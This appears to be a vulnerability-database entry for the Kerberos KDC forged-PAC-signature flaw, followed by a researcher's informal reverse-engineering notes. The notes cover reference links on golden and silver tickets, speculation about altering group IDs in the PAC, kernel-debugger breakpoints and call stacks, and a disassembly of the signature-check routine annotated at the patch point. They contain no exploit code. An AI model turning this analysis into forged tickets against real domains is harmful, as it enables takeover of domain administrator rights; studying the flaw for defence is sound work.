The Kerberos Key Distribution Center (KDC) in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote authenticated domain users to obtain domain administrator privileges via a forged signature in a ticket, as exploited in the wild in November 2014, aka “Kerberos Checksum Vulnerability.”
Recent assessments:
wchen-r7 at September 12, 2019 6:07pm UTC reported:
Troubleshooting kerberos on windows
<http://technet.microsoft.com/en-us/library/cc738673(WS.10).aspx>
<http://www.itninja.com/blog/view/taming-the-three-headed-beast-kerberos>
Golden and silver ticket
<https://www.youtube.com/watch?v=-IMrNGPZTl0> (blackhat)
<http://www.slideshare.net/gentilkiwi/bluehat-2014realitybites>
<http://www.nosuchcon.org/talks/2014/D2_02_Benjamin_Delpy_Mimikatz.pdf>
<http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos>
<http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos> (ticket format)
<https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos>
MS-PAC: Privilege Attribute Certificate Data Structure
<http://msdn.microsoft.com/en-us/library/cc237917.aspx>
Microsoft Authorization Data Specification
<http://mirror.die.net/banned/microsoft-kerberos-extensions.html>
Authentication structures:
<http://msdn.microsoft.com/en-us/library/windows/desktop/aa378120(v=vs.85).aspx>
More Kerberos fun with PAC’s- decrypt the PAC
<http://i1.blogs.msdn.com/b/spatdsg/archive/2009/03/26/more-kerberos-fun-with-pac-s.aspx>
Kerberos PAC Validation… what is it?
<http://blogs.msdn.com/b/spatdsg/archive/2007/03/07/pac-validation.aspx>
Kerberos on windows
<https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-whitepaper.pdf>
<http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos>
Windows 2003: Security Event ids related to kerberos 540 (logon) / 538 (logoff)
I’m pretty sure the information to forge exists inside service kerberos ticket
On my opinion the idea is to forge the KERB_VALIDATION_INFO. It contains:
ULONG GroupCount;
[size_is(GroupCount)] PGROUP_MEMBERSHIP GroupIds;
Where:
typedef struct _GROUP_MEMBERSHIP {
ULONG RelativeId;
ULONG Attributes;
} *PGROUP_MEMBERSHIP;
By modifying the RelativeId in the service ticket, I think is the way related
to the privilege escalation (See ticket_samples.txt for KERB_VALIDATION_INFO dump)
But… how to tamper that information? Since the kerberos communication (server
running on 88/udp) happens through lsass (running as system), tampering communications
doesn’t look a good idea. Even worse, the KERB_VALIDATION_INFO is located inside the
ticket, which travels encrypted. I NEED TO CHECK, CAREFULLY WHERE THE PAC IS ADDED,
HOPEFULLY, IT’S IN A BLOG CIPHERED WITH THE USER PRIVATE KEY. CANNOR REMIND JUST NOW, TODO!
Just remembering cached tickets maybe can be tampered TODO:review
bp kdcsvc!I_GetAsTicket ".echo I_GetAsTicket; g"
Reachecd through _KdcGetTicket (also an export)
bp kdcsvc!KdcVerifyPacSignature ".echo KdcVerifyPacSignature; g"
This one is reached from when handling TGT Requests, aparently
HandleTGSRequest –> GetTGSTicket…
bp kdcsvc!KdcVerifyPac ".echo KdcVerifyPac; g"
It’s an export, also reached through “CredentialUpdateFree”
When I authenticate to a service, IIS, through Kerberos, it’s the call sequence:
I_GetAsTicket
KdcVerifyPacSignature
KdcVerifyPacSignature
I_GetAsTicket
KdcVerifyPacSignature
Okay, come on to check, what happens when I add the kerberos function:
kd> bp kerberos!KerbVerifyPacsignature ".echo kerberos!KerbVerifyPacsignature; g"
kd> g
I_GetAsTicket
KdcVerifyPacSignature
kerberos!KerbVerifyPacsignature
I_GetAsTicket
KdcVerifyPacSignature
kerberos!KerbVerifyPacsignature
Makes sense! Come on to check some call stacks to check where things come from:
kd> bl
0 e 63a8b814 0001 (0001) KDCSVC!I_GetASTicket ".echo I_GetAsTicket; kb 4; g"
1 e 63a89013 0001 (0001) KDCSVC!KdcVerifyPacSignature ".echo KdcVerifyPacSignature; kb 4; g"
2 e 63a8d3ad 0001 (0001) KDCSVC!KdcVerifyPac ".echo KdcVerifyPac; kb 4; g"
3 e 71ca8587 0001 (0001) kerberos!KerbVerifyPacSignature ".echo kerberos!KerbVerifyPacsignature; kb 4; g"
_GetAsTicket
ChildEBP RetAddr Args to Child
04e4fe38 63a8b80a 050ae688 001583e8 04e4feb0 KDCSVC!I_GetASTicket
04e4fed8 63a87305 00000000 050ae688 001149a8 KDCSVC!KdcGetTicket+0x1b5
04e4ff38 71fd1700 0015b9e0 00000137 00000000 KDCSVC!KdcAtqDgIoCompletion+0x129
04e4ff58 71fd1858 00000137 00000000 0015b9e4 NTDSATQ!ATQ_CONTEXT::IOCompletion+0x31
KdcVerifyPacSignature
ChildEBP RetAddr Args to Child
04e4f740 63a89f6f 00145238 04e4f91c 00000250 KDCSVC!KdcVerifyPacSignature
04e4f770 63a89543 00145238 000ec8f0 04e4f91c KDCSVC!KdcVerifyAndResignPac+0xb3
04e4f83c 63a87125 04e4f880 04e4fe74 00000000 KDCSVC!KdcInsertAuthorizationData+0x1d6
04e4f99c 63a85055 000ec8f0 04e4fea0 04e4fe98 KDCSVC!I_GetTGSTicket+0x729
kerberos!KerbVerifyPacsignature
ChildEBP RetAddr Args to Child
00aef7b8 71cb1ef3 00aefa70 0013d8f0 00000250 kerberos!KerbVerifyPacSignature
00aef8fc 71cb1159 00000001 00aefab0 0017c1e8 kerberos!KerbCreateTokenFromTicket+0x1de
00aefaec 4ab860d2 0016cce0 00000000 3c9b6229 kerberos!SpAcceptLsaModeContext+0xb09
00aefb60 4abc94a8 00aefc18 00aefbf8 00aefbe0 LSASRV!WLsaAcceptContext+0x139
I_GetAsTicket
ChildEBP RetAddr Args to Child
04e4fe38 63a8b80a 050b73b8 001583e8 04e4feb0 KDCSVC!I_GetASTicket
04e4fed8 63a87305 00000000 050b73b8 001149a8 KDCSVC!KdcGetTicket+0x1b5
04e4ff38 71fd1700 0015bc10 00000137 00000000 KDCSVC!KdcAtqDgIoCompletion+0x129
04e4ff58 71fd1858 00000137 00000000 0015bc14 NTDSATQ!ATQ_CONTEXT::IOCompletion+0x31
KdcVerifyPacSignature
ChildEBP RetAddr Args to Child
04e4f740 63a89f6f 00145418 04e4f91c 00000250 KDCSVC!KdcVerifyPacSignature
04e4f770 63a89543 00145418 000ec8f0 04e4f91c KDCSVC!KdcVerifyAndResignPac+0xb3
04e4f83c 63a87125 04e4f880 04e4fe74 00000000 KDCSVC!KdcInsertAuthorizationData+0x1d6
04e4f99c 63a85055 000ec8f0 04e4fea0 04e4fe98 KDCSVC!I_GetTGSTicket+0x729
kerberos!KerbVerifyPacsignature
ChildEBP RetAddr Args to Child
00c6f7b8 71cb1ef3 00c6fa70 0013d8f0 00000250 kerberos!KerbVerifyPacSignature
00c6f8fc 71cb1159 00000001 00c6fab0 0017c190 kerberos!KerbCreateTokenFromTicket+0x1de
00c6faec 4ab860d2 0016cce0 00000000 3f4a60da kerberos!SpAcceptLsaModeContext+0xb09
00c6fb60 4abc94a8 00c6fc18 00c6fbf8 00c6fbe0 LSASRV!WLsaAcceptContext+0x139
So, obviously I_GetAsTicket is called through the first query (AS), KdcVerifyPacSignature and
kerberos!KerbVerifyPacsignature is called on the second request (TGT). Looks like the PAC is
parsed/verified in the second query (TGT, makes sense).
[*] Other backtraces for my review while logging in the domain from XP SP3 client
kd> g
Breakpoint 4 hit
kerberos!PAC_UnMarshal:
001b:71d2d109 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf980 71d17acb 000b8780 00000290 009cfd84 kerberos!PAC_UnMarshal
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x2ec
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 5 hit
kerberos!PAC_ReMarshal:
001b:71d2d188 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf89c 71d15b25 000b8780 00000290 009cf9cc kerberos!PAC_ReMarshal
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x185
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 4 hit
kerberos!PAC_UnMarshal:
001b:71d2d109 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf89c 71d15c04 000b8780 00000290 009cf9cc kerberos!PAC_UnMarshal
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x264
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 1 hit
kerberos!PAC_UnmarshallValidationInfo:
001b:71d2d466 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 3 hit
kerberos!PAC_DecodeValidationInformation:
001b:71d2cf2e 6a14 push 14h
kd> kb
ChildEBP RetAddr Args to Child
009cf884 71d2d47d 000b87c8 000001f0 009cf9f0 kerberos!PAC_DecodeValidationInformation
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo+0x17
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 8 hit
kerberos!PPAC_IDL_VALIDATION_INFO_Decode:
001b:71d2d6f5 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
009cf844 71d2cf7f 000936f0 009cf9f0 000b89c0 kerberos!PPAC_IDL_VALIDATION_INFO_Decode
009cf884 71d2d47d 000b87c8 000001f0 009cf9f0 kerberos!PAC_DecodeValidationInformation+0x51
009cf898 71d15cd6 009cf9f0 000b87c8 000001f0 kerberos!PAC_UnmarshallValidationInfo+0x17
009cf96c 71d17b42 009cf9c4 000b8780 00000290 kerberos!KerbVerifyPacSignature+0x336
009cf9fc 71d02dcb 000fbd18 009cfc34 000d62b8 kerberos!KerbCreateTokenFromLogonTicket+0x363
009cfc8c 75757814 009cfea8 00000002 000d62b8 kerberos!LsaApLogonUserEx2+0xa9e
009cfcf8 75742941 009cfea8 00000002 000e23c8 LSASRV!NegLogonUserEx2+0x21d
009cfe98 75742286 009cfea8 000b6040 00107500 LSASRV!LsapAuApiDispatchLogonUser+0x335
009cfeac 75739429 00107500 000b4e90 000b6040 LSASRV!LpcLsaLogonUser+0x22
009cfec4 7573934d 00107500 757cf738 000c7968 LSASRV!DispatchAPI+0x46
009cff50 75738ca2 000b4e90 009cff98 7c809c55 LSASRV!LpcHandler+0x153
009cff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
009cffb4 7c80b713 000c34e0 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
009cffec 00000000 75738d13 000c34e0 00000000 kernel32!BaseThreadStart+0x37
kd> g
[*] More breakpoints when from XP SP3 client: Looks like there are two paths, to
get the TGT ticket, and to get the service ticket. The last one is the interesting
I think.
kd> kb
ChildEBP RetAddr Args to Child
0007f4c0 71cfbc26 00103828 000ed248 000c2f48 kerberos!KerbCacheTicket
0007f68c 71cf3611 00101ce0 000f6c30 00000000 kerberos!KerbGetAuthenticationTicket+0xa77
0007f760 71cf33c8 00101ce0 000f6c30 00000000 kerberos!KerbGetTicketGrantingTicket+0x2f4
0007f794 71cf1db1 00000000 000f6c30 00000000 kerberos!KerbGetTicketForCredential+0x5d
0007f7f4 71cf2d85 000f6c30 80000002 00000000 kerberos!KerbReferenceCredential+0x12a
0007f9a8 7573c293 000f6c30 00000000 0007fe80 kerberos!SpInitLsaModeContext+0xae3
0007fa20 7573ca9a 0007fbb0 0007fb90 0007fe80 LSASRV!WLsaInitContext+0x154
0007fc14 7575dedc 00000000 000a5ad8 0007fe80 LSASRV!NegBuildRequestToken+0x53d
0007fc48 7575de92 00108ef0 0007fe80 00000002 LSASRV!NegGenerateInitialToken+0x28
0007fcac 7573c293 00108ef0 00000000 0007fe80 LSASRV!NegInitLsaModeContext+0x3e6
0007fd24 7573c17c 000f9bf8 000f9c00 0007fe80 LSASRV!WLsaInitContext+0x154
0007feac 75739429 000f9bd0 000b5100 000f9ce0 LSASRV!LpcInitContext+0x1a2
0007fec4 7573934d 000f9bd0 757cf738 0009af50 LSASRV!DispatchAPI+0x46
0007ff50 75738ca2 000b5100 0007ff98 7c809c55 LSASRV!LpcHandler+0x153
0007ff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
0007ffb4 7c80b713 000d3758 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
0007ffec 00000000 75738d13 000d3758 00000000 kernel32!BaseThreadStart+0x37
kd> g
Breakpoint 13 hit
kerberos!KerbCacheTicket:
001b:71cf9a79 8bff mov edi,edi
kd> kb
ChildEBP RetAddr Args to Child
0007f6ec 71cf9a6f 00103818 000d5240 000c2f48 kerberos!KerbCacheTicket
0007f7cc 71cf722e 00101ce0 000f6c30 00000000 kerberos!KerbGetServiceTicket+0x893
0007f9a8 7573c293 00000002 00000000 0007fe80 kerberos!SpInitLsaModeContext+0xd60
0007fa20 7573ca9a 0007fbb0 0007fb90 0007fe80 LSASRV!WLsaInitContext+0x154
0007fc14 7575dedc 00000000 000a5ad8 0007fe80 LSASRV!NegBuildRequestToken+0x53d
0007fc48 7575de92 00108ef0 0007fe80 00000002 LSASRV!NegGenerateInitialToken+0x28
0007fcac 7573c293 00108ef0 00000000 0007fe80 LSASRV!NegInitLsaModeContext+0x3e6
0007fd24 7573c17c 000f9bf8 000f9c00 0007fe80 LSASRV!WLsaInitContext+0x154
0007feac 75739429 000f9bd0 000b5100 000f9ce0 LSASRV!LpcInitContext+0x1a2
0007fec4 7573934d 000f9bd0 757cf738 0009af50 LSASRV!DispatchAPI+0x46
0007ff50 75738ca2 000b5100 0007ff98 7c809c55 LSASRV!LpcHandler+0x153
0007ff74 75738d66 0009bd98 00000000 00a4fab0 LSASRV!SpmPoolThreadBase+0xb9
0007ffb4 7c80b713 000d3758 00000000 00a4fab0 LSASRV!LsapThreadBase+0x91
0007ffec 00000000 75738d13 000d3758 00000000 kernel32!BaseThreadStart+0x37
kd> g
Reaching the important point on my case:
kd> uf KDCSVC!KdcVerifyPacSignature
KDCSVC!KdcVerifyPacSignature:
63a89013 8bff mov edi,edi
63a89015 55 push ebp
63a89016 8bec mov ebp,esp
63a89018 81eca8000000 sub esp,0A8h
63a8901e a10010ab63 mov eax,dword ptr [KDCSVC!__security_cookie (63ab1000)]
63a89023 53 push ebx
63a89024 56 push esi
63a89025 8b7514 mov esi,dword ptr [ebp+14h]
63a89028 8945fc mov dword ptr [ebp-4],eax
63a8902b 8b4508 mov eax,dword ptr [ebp+8]
63a8902e 57 push edi
63a8902f 8945ac mov dword ptr [ebp-54h],eax
63a89032 8b450c mov eax,dword ptr [ebp+0Ch]
63a89035 6a0f push 0Fh
63a89037 33db xor ebx,ebx
63a89039 8945a8 mov dword ptr [ebp-58h],eax
63a8903c 59 pop ecx
63a8903d ff7510 push dword ptr [ebp+10h]
63a89040 66899d58ffffff mov word ptr [ebp-0A8h],bx
63a89047 33c0 xor eax,eax
63a89049 8dbd5affffff lea edi,[ebp-0A6h]
63a8904f f3ab rep stos dword ptr es:[edi]
63a89051 56 push esi
63a89052 8975b0 mov dword ptr [ebp-50h],esi
63a89055 895dbc mov dword ptr [ebp-44h],ebx
63a89058 895db8 mov dword ptr [ebp-48h],ebx
63a8905b 895db4 mov dword ptr [ebp-4Ch],ebx
63a8905e 66ab stos word ptr es:[edi]
63a89060 e81feeffff call KDCSVC!PAC_UnMarshal (63a87e84)
63a89065 85c0 test eax,eax
63a89067 0f84178d0000 je KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)
KDCSVC!KdcVerifyPacSignature+0x5a:
63a8906d 8d8558ffffff lea eax,[ebp-0A8h]
63a89073 50 push eax
63a89074 b92810ab63 mov ecx,offset KDCSVC!SecData (63ab1028)
63a89079 e8668bffff call KDCSVC!CSecurityData::GetKrbtgtTicketInfo (63a81be4)
63a8907e 3bc3 cmp eax,ebx
63a89080 8945bc mov dword ptr [ebp-44h],eax
63a89083 0f856c8c0000 jne KDCSVC!KdcVerifyPacSignature+0x72 (63a91cf5)
KDCSVC!KdcVerifyPacSignature+0x7d:
63a89089 53 push ebx
63a8908a 6a06 push 6
63a8908c 56 push esi
63a8908d e846ecffff call KDCSVC!PAC_Find (63a87cd8)
63a89092 8bd8 mov ebx,eax
63a89094 85db test ebx,ebx
63a89096 0f8488010000 je KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0x90:
63a8909c 8b4b04 mov ecx,dword ptr [ebx+4]
63a8909f 83f904 cmp ecx,4
63a890a2 0f827c010000 jb KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0x9c:
63a890a8 8b4308 mov eax,dword ptr [ebx+8]
63a890ab 83c1fc add ecx,0FFFFFFFCh
63a890ae 8d5004 lea edx,[eax+4]
63a890b1 894598 mov dword ptr [ebp-68h],eax
63a890b4 8bc1 mov eax,ecx
63a890b6 c1e902 shr ecx,2
63a890b9 8bf2 mov esi,edx
63a890bb 8d7de8 lea edi,[ebp-18h]
63a890be f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
63a890c0 8bc8 mov ecx,eax
63a890c2 83e103 and ecx,3
63a890c5 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
63a890c7 8b4b04 mov ecx,dword ptr [ebx+4]
63a890ca 83e904 sub ecx,4
63a890cd 8bfa mov edi,edx
63a890cf 8bd1 mov edx,ecx
63a890d1 c1e902 shr ecx,2
63a890d4 33c0 xor eax,eax
63a890d6 f3ab rep stos dword ptr es:[edi]
63a890d8 6a00 push 0
63a890da 8bca mov ecx,edx
63a890dc 6a07 push 7
63a890de ff75b0 push dword ptr [ebp-50h]
63a890e1 83e103 and ecx,3
63a890e4 f3aa rep stos byte ptr es:[edi]
63a890e6 e8edebffff call KDCSVC!PAC_Find (63a87cd8)
63a890eb 85c0 test eax,eax
63a890ed 89459c mov dword ptr [ebp-64h],eax
63a890f0 0f842e010000 je KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0xea:
63a890f6 8b5004 mov edx,dword ptr [eax+4]
63a890f9 83fa04 cmp edx,4
63a890fc 0f8222010000 jb KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0xf6:
63a89102 8b4808 mov ecx,dword ptr [eax+8]
63a89105 8d7104 lea esi,[ecx+4]
63a89108 894da0 mov dword ptr [ebp-60h],ecx
63a8910b 8d4afc lea ecx,[edx-4]
63a8910e 8bd1 mov edx,ecx
63a89110 c1e902 shr ecx,2
63a89113 ff7510 push dword ptr [ebp+10h]
63a89116 8975a4 mov dword ptr [ebp-5Ch],esi
63a89119 ff75b0 push dword ptr [ebp-50h]
63a8911c 8d7dc0 lea edi,[ebp-40h]
63a8911f f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
63a89121 8bca mov ecx,edx
63a89123 83e103 and ecx,3
63a89126 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
63a89128 8b4804 mov ecx,dword ptr [eax+4]
63a8912b 8b7da4 mov edi,dword ptr [ebp-5Ch]
63a8912e 83e904 sub ecx,4
63a89131 8bd1 mov edx,ecx
63a89133 c1e902 shr ecx,2
63a89136 33c0 xor eax,eax
63a89138 f3ab rep stos dword ptr es:[edi]
63a8913a 8bca mov ecx,edx
63a8913c 83e103 and ecx,3
63a8913f f3aa rep stos byte ptr es:[edi]
63a89141 e810e5ffff call KDCSVC!PAC_ReMarshal (63a87656)
63a89146 84c0 test al,al
63a89148 0f84d6000000 je KDCSVC!KdcVerifyPacSignature+0x2d1 (63a89224)
KDCSVC!KdcVerifyPacSignature+0x142:
63a8914e 8d45b8 lea eax,[ebp-48h]
63a89151 50 push eax
63a89152 8b4598 mov eax,dword ptr [ebp-68h]
63a89155 ff30 push dword ptr [eax]
63a89157 e8538affff call KDCSVC!CDLocateCheckSum (63a81baf)
63a8915c 85c0 test eax,eax
63a8915e 0f8ce38b0000 jl KDCSVC!KdcVerifyPacSignature+0x224 (63a91d47)
KDCSVC!KdcVerifyPacSignature+0x158:
63a89164 8b55b8 mov edx,dword ptr [ebp-48h]
63a89167 837a0414 cmp dword ptr [edx+4],14h // DEBUG HERE IS THE ORIGINAL PATCH
63a8916b 0f87138c0000 ja KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)
KDCSVC!KdcVerifyPacSignature+0x165:
63a89171 8b4a20 mov ecx,dword ptr [edx+20h]
63a89174 85c9 test ecx,ecx
63a89176 8d45b4 lea eax,[ebp-4Ch]
63a89179 50 push eax
63a8917a 6a11 push 11h
63a8917c 0f857e8b0000 jne KDCSVC!KdcVerifyPacSignature+0x172 (63a91d00)
KDCSVC!KdcVerifyPacSignature+0x183:
63a89182 8b45ac mov eax,dword ptr [ebp-54h]
63a89185 ff7004 push dword ptr [eax+4]
63a89188 ff7008 push dword ptr [eax+8]
63a8918b ff521c call dword ptr [edx+1Ch]
KDCSVC!KdcVerifyPacSignature+0x18f:
63a8918e 85c0 test eax,eax
63a89190 0f8cee8b0000 jl KDCSVC!KdcVerifyPacSignature+0x261 (63a91d84)
KDCSVC!KdcVerifyPacSignature+0x197:
63a89196 ff75b0 push dword ptr [ebp-50h]
63a89199 8b45b8 mov eax,dword ptr [ebp-48h]
63a8919c ff7510 push dword ptr [ebp+10h]
63a8919f ff75b4 push dword ptr [ebp-4Ch]
63a891a2 ff5010 call dword ptr [eax+10h]
63a891a5 8d45d4 lea eax,[ebp-2Ch]
63a891a8 50 push eax
63a891a9 ff75b4 push dword ptr [ebp-4Ch]
63a891ac 8b45b8 mov eax,dword ptr [ebp-48h]
63a891af ff5014 call dword ptr [eax+14h]
63a891b2 8d45b4 lea eax,[ebp-4Ch]
63a891b5 50 push eax
63a891b6 8b45b8 mov eax,dword ptr [ebp-48h]
63a891b9 ff5018 call dword ptr [eax+18h]
63a891bc 8b45b8 mov eax,dword ptr [ebp-48h]
63a891bf 8b4804 mov ecx,dword ptr [eax+4]
63a891c2 8b4304 mov eax,dword ptr [ebx+4]
63a891c5 83e804 sub eax,4
63a891c8 3bc8 cmp ecx,eax
63a891ca 754e jne KDCSVC!KdcVerifyPacSignature+0x2ba (63a8921a)
KDCSVC!KdcVerifyPacSignature+0x1d1:
63a891cc 8d7de8 lea edi,[ebp-18h]
63a891cf 8d75d4 lea esi,[ebp-2Ch]
63a891d2 33c0 xor eax,eax
63a891d4 f3a6 repe cmps byte ptr [esi],byte ptr es:[edi]
63a891d6 7542 jne KDCSVC!KdcVerifyPacSignature+0x2ba (63a8921a)
KDCSVC!KdcVerifyPacSignature+0x1e1:
63a891d8 8b45a8 mov eax,dword ptr [ebp-58h]
63a891db 817820f6010000 cmp dword ptr [eax+20h],1F6h
63a891e2 0f852c8b0000 jne KDCSVC!KdcVerifyPacSignature+0x1f1 (63a91d14)
KDCSVC!KdcVerifyPacSignature+0x2ee:
63a891e8 837dbc29 cmp dword ptr [ebp-44h],29h
63a891ec 0f841e8c0000 je KDCSVC!KdcVerifyPacSignature+0x2f4 (63a91e10)
KDCSVC!KdcVerifyPacSignature+0x340:
63a891f2 837db400 cmp dword ptr [ebp-4Ch],0
63a891f6 5f pop edi
63a891f7 5e pop esi
63a891f8 5b pop ebx
63a891f9 0f85668c0000 jne KDCSVC!KdcVerifyPacSignature+0x349 (63a91e65)
KDCSVC!KdcVerifyPacSignature+0x357:
63a891ff 8d8558ffffff lea eax,[ebp-0A8h]
63a89205 50 push eax
63a89206 e8498cffff call KDCSVC!FreeTicketInfo (63a81e54)
63a8920b 8b4dfc mov ecx,dword ptr [ebp-4]
63a8920e 8b45bc mov eax,dword ptr [ebp-44h]
63a89211 e83f89ffff call KDCSVC!__security_check_cookie (63a81b55)
63a89216 c9 leave
63a89217 c21000 ret 10h
KDCSVC!KdcVerifyPacSignature+0x2ba:
63a8921a 683092a863 push offset KDCSVC!`string' (63a89230)
63a8921f e9bb8b0000 jmp KDCSVC!KdcVerifyPacSignature+0x2bf (63a91ddf)
KDCSVC!KdcVerifyPacSignature+0x2d1:
63a89224 c745bc3c000000 mov dword ptr [ebp-44h],3Ch
63a8922b e9c18b0000 jmp KDCSVC!KdcVerifyPacSignature+0x2d8 (63a91df1)
KDCSVC!KdcVerifyPacSignature+0x72:
63a91cf5 50 push eax
63a91cf6 e884120100 call KDCSVC!KerbMapKerbError (63aa2f7f)
63a91cfb e9f1000000 jmp KDCSVC!KdcVerifyPacSignature+0x2d8 (63a91df1)
KDCSVC!KdcVerifyPacSignature+0x172:
63a91d00 8d45e8 lea eax,[ebp-18h]
63a91d03 50 push eax
63a91d04 8b45ac mov eax,dword ptr [ebp-54h]
63a91d07 ff7004 push dword ptr [eax+4]
63a91d0a ff7008 push dword ptr [eax+8]
